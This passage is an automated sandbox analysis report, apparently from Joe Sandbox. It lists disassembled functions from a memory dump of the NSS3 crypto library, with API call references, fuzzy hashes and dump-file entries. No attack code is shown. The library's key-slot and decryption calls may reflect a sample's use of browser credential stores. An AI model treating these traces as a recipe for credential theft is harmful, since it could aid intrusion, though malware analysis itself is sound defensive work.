Part of subcall function 6C715DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C715DEC
Part of subcall function 6C715DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C715E0F

SECITEM_DupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7169BA

Part of subcall function 6C75FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C709003,?), ref: 6C75FD91
Part of subcall function 6C75FD80: PORT_Alloc_Util.NSS3(A4686C76,?), ref: 6C75FDA2
Part of subcall function 6C75FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C76,?,?), ref: 6C75FDC4

VFY_EndWithSignature.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C716A59
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C716AB7
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C716ACA
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C716AE0
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C716AE9

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Alloc_Item_free$AlgorithmDestroyErrorPolicyPublicSignatureWithZfreememcpy
String ID:
API String ID: 2730469119-0
Opcode ID: 027fc80cf9bc5c8929cb23ef677e7e81f14cd00abf6299f495ffb8318609af42
Instruction ID: 14305529608583ff3e78b74f66ff286f5066dcf737ae4c432983f688d251c615
Opcode Fuzzy Hash: 027fc80cf9bc5c8929cb23ef677e7e81f14cd00abf6299f495ffb8318609af42
Instruction Fuzzy Hash: B941B2B16446009BEB10DF24ED49B9A77E9FF85714F188438E499C7A41EF31EA11C7E1

Function 6C7689A0 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3 ref: 6C7689DF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7689EA
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C768A04

Part of subcall function 6C76BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C76800A,00000000,?,00000000,?), ref: 6C76BC3F

PK11_PBEKeyGen.NSS3(00000000,?,?,00000000,?), ref: 6C768A47
PK11_GetInternalKeySlot.NSS3 ref: 6C768A7E
PK11_PBEKeyGen.NSS3(00000000,?,00000000,00000000,?), ref: 6C768A96

Part of subcall function 6C74F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C74F854
Part of subcall function 6C74F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C74F868
Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C74F882
Part of subcall function 6C74F820: free.MOZGLUE(04C483FF,?,?), ref: 6C74F889
Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C74F8A4
Part of subcall function 6C74F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C74F8AB
Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C74F8C9
Part of subcall function 6C74F820: free.MOZGLUE(280F10EC,?,?), ref: 6C74F8D0

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C768AD4

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$K11_Util$CriticalDeleteItem_Section$CopyInternalSlot$AlgorithmTag_Zfree
String ID:
API String ID: 3389286309-0
Opcode ID: 13071675a6988c4e6ddbb1a1fa02ea8613885ac4e2ce1244e57cbd9f6f36cad3
Instruction ID: 24a88ca9eebf1994f7b234c29bbe89dfd4450a71836eb2c23a286cf49ff69262
Opcode Fuzzy Hash: 13071675a6988c4e6ddbb1a1fa02ea8613885ac4e2ce1244e57cbd9f6f36cad3
Instruction Fuzzy Hash: 5741B675600304BBD7019E66DE49B6B7768EB46758F44803AFD188BF42EB32E914C7E2

Function 6C74AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C74AB3E,?,?,?), ref: 6C74AC35

Part of subcall function 6C72CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C72CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C74AB3E,?,?,?), ref: 6C74AC55

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C74AB3E,?,?), ref: 6C74AC70

Part of subcall function 6C72E300: TlsGetValue.KERNEL32 ref: 6C72E33C
Part of subcall function 6C72E300: EnterCriticalSection.KERNEL32(?), ref: 6C72E350
Part of subcall function 6C72E300: PR_Unlock.NSS3(?), ref: 6C72E5BC
Part of subcall function 6C72E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C72E5CA
Part of subcall function 6C72E300: TlsGetValue.KERNEL32 ref: 6C72E5F2
Part of subcall function 6C72E300: EnterCriticalSection.KERNEL32(?), ref: 6C72E606
Part of subcall function 6C72E300: PORT_Alloc_Util.NSS3(?), ref: 6C72E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C74AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C74AB3E), ref: 6C74ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C74AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C74AD2B

Part of subcall function 6C72F360: TlsGetValue.KERNEL32(00000000,?,6C74A904,?), ref: 6C72F38B
Part of subcall function 6C72F360: EnterCriticalSection.KERNEL32(?,?,?,6C74A904,?), ref: 6C72F3A0
Part of subcall function 6C72F360: PR_Unlock.NSS3(?,?,?,?,6C74A904,?), ref: 6C72F3D3

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 4708270d9a28ecb508db0646dc25c3bb6a96295571ac9859e2aabdcd8e7be7d8
Instruction ID: 27b1e4b7d8ca9aee544729b6e4f4b12089f870e9f45213e812cbf0652b63da14
Opcode Fuzzy Hash: 4708270d9a28ecb508db0646dc25c3bb6a96295571ac9859e2aabdcd8e7be7d8
Instruction Fuzzy Hash: 23313BB1E002065FEB008F69CD499AF7776EF84728B18C138E8159BB41EB31DD1587A1

Function 6C702920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C70294E

Part of subcall function 6C761820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C701D97,?,?), ref: 6C761836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C70296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C702991

Part of subcall function 6C761820: PR_SetError.NSS3(FFFFE005,00000000,?,6C701D97,?,?), ref: 6C76184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C7029AF
PR_Now.NSS3 ref: 6C702A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C702A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C702A79

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID:
API String ID: 2509447271-0
Opcode ID: 7aae68de56e2814b60efbf54f5ba9bcfc81d0ec9e6bc72d82a3699684acf6c9f
Instruction ID: 33a41ce52462399c2111a2308ac1fe36c24461eb16ef700e6e970ef6bc15546d
Opcode Fuzzy Hash: 7aae68de56e2814b60efbf54f5ba9bcfc81d0ec9e6bc72d82a3699684acf6c9f
Instruction Fuzzy Hash: CA4195B2B093119FC710CE29CA49A4FB7E5BBD8754F554A2DFC9893740EB30E9098792

Function 6C728C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C728C7C

Part of subcall function 6C7C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DC6
Part of subcall function 6C7C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DD1
Part of subcall function 6C7C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C728CB0
TlsGetValue.KERNEL32 ref: 6C728CD1
EnterCriticalSection.KERNEL32(?), ref: 6C728CE5
PR_Unlock.NSS3(?), ref: 6C728D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C728D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C728D93

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 0303a34f6b5a55fa721d90b3d9caee49ff666b1e489548874b3be67fa1e1d6f6
Instruction ID: fbab5b84b39a18ccb87fb130d2b0edb5e3e24b499933c046e4013404dd7480b6
Opcode Fuzzy Hash: 0303a34f6b5a55fa721d90b3d9caee49ff666b1e489548874b3be67fa1e1d6f6
Instruction Fuzzy Hash: DD316A72E00201AFE7109F68CE497EA77B0BF59318F140236EA1967B90D776A958CBC1

Function 6C769D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C769C5B), ref: 6C769D82

Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C769C5B), ref: 6C769DA9

Part of subcall function 6C761340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C76136A
Part of subcall function 6C761340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C76137E
Part of subcall function 6C761340: PL_ArenaGrow.NSS3(?,6C6FF599,?,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?), ref: 6C7613CF
Part of subcall function 6C761340: PR_Unlock.NSS3(?,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C76145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C769C5B), ref: 6C769DCE

Part of subcall function 6C761340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C7613F0
Part of subcall function 6C761340: PL_ArenaGrow.NSS3(?,6C6FF599,?,?,?,00000000,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C761445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C769C5B), ref: 6C769DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C769C5B), ref: 6C769DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C769C5B), ref: 6C769E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C769C5B), ref: 6C769E91

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

Part of subcall function 6C761560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C75FAAB,00000000), ref: 6C76157E
Part of subcall function 6C761560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C75FAAB,00000000), ref: 6C761592
Part of subcall function 6C761560: memset.VCRUNTIME140(?,00000000,?), ref: 6C761600
Part of subcall function 6C761560: PL_ArenaRelease.NSS3(?,?), ref: 6C761620
Part of subcall function 6C761560: PR_Unlock.NSS3(?), ref: 6C761639

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 23c55c91adbb6ba8cb2d8ffe2acc72982d6332429b1ecde802b93a8614411b74
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 634182B5501606AFE740DF16DA48B92BBA5FF55358F148128DC188BFA1EB72E834CF90

Function 6C75DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C75D9E4,00000000), ref: 6C75DC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C75D9E4,00000000), ref: 6C75DC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C75D9E4,00000000), ref: 6C75DC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C75DC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C75DCAD

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: 94a91767e5bffdb26b4a94cf4f63a6ed16708b0d24d027a17cb411382dfb2f78
Instruction ID: c3ef836c5fdf1e2557be9fbaae9ace1555f7c9b5d544730e9773e458b7395726
Opcode Fuzzy Hash: 94a91767e5bffdb26b4a94cf4f63a6ed16708b0d24d027a17cb411382dfb2f78
Instruction Fuzzy Hash: 6E31AFB5A002019FE750CF1DDA88B92B7F8AF25358F548438E94CCBB01EB71E954CBA5

Function 6C722E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C71E728,?,00000038,?,?,00000000), ref: 6C722E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C722E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C722E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C722E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C722E9E
PR_Unlock.NSS3(?), ref: 6C722EAB
PR_Unlock.NSS3(?), ref: 6C722F0D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: aeab368710aa53ca296f1872af10318d95b92e888c29513003e3a8a137e3c21f
Instruction ID: aa1d6fe88d4f649e8d6e1e991c01fd355faa162b22cbb90ced9ced1d77de0124
Opcode Fuzzy Hash: aeab368710aa53ca296f1872af10318d95b92e888c29513003e3a8a137e3c21f
Instruction Fuzzy Hash: 023126B5E00106ABEB115F28DD488B6B779FF0526CB088174EC0887A12EB31ED65CBD1

Function 6C76CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C76CD93,?), ref: 6C76CEEE

Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C76CD93,?), ref: 6C76CEFC

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C76CD93,?), ref: 6C76CF0B

Part of subcall function 6C760840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7608B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C76CD93,?), ref: 6C76CF1D

Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C76CD93,?), ref: 6C76CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C76CD93,?), ref: 6C76CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C76CD93,?,?,?,?,?,?,?,?,?,?,?,6C76CD93,?), ref: 6C76CF78

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: e9e574ef51c2254fd3ffbae26b5fd7c8aefb496602be3f6a92fcc1d6c4607581
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 2C11A2A6E042055BEF00AAA76E49BABB5EC9F5474EF044039EC09D7F41FB60D908C6B1

Function 6C718C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C718C1B
EnterCriticalSection.KERNEL32 ref: 6C718C34
PL_ArenaAllocate.NSS3 ref: 6C718C65
PR_Unlock.NSS3 ref: 6C718C9C
PR_Unlock.NSS3 ref: 6C718CB6

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

Strings

KRAM, xrefs: 6C718C8F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: fac69022f3de3ec6a474609d40eed4324e8c6f581ef4cc9a8b2ba790bcd75cc0
Instruction ID: dce1ce97aa1a50e508a58f6c078c1cbd6437ddeed09cd8bd292c1c89da65f210
Opcode Fuzzy Hash: fac69022f3de3ec6a474609d40eed4324e8c6f581ef4cc9a8b2ba790bcd75cc0
Instruction Fuzzy Hash: 3E2174B1A096018FD700AF79C588559B7F4FF15308F0A89BAD8888BB11EB35D886CFD1

Function 6C728E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C742E62,?,?,?,?,?,?,?,00000000,?,?,?,6C714F1C), ref: 6C728EA2

Part of subcall function 6C74F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C74F854
Part of subcall function 6C74F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C74F868
Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C74F882
Part of subcall function 6C74F820: free.MOZGLUE(04C483FF,?,?), ref: 6C74F889
Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C74F8A4
Part of subcall function 6C74F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C74F8AB
Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C74F8C9
Part of subcall function 6C74F820: free.MOZGLUE(280F10EC,?,?), ref: 6C74F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C742E62,?,?,?,?,?,?,?,00000000,?,?,?,6C714F1C), ref: 6C728EC3
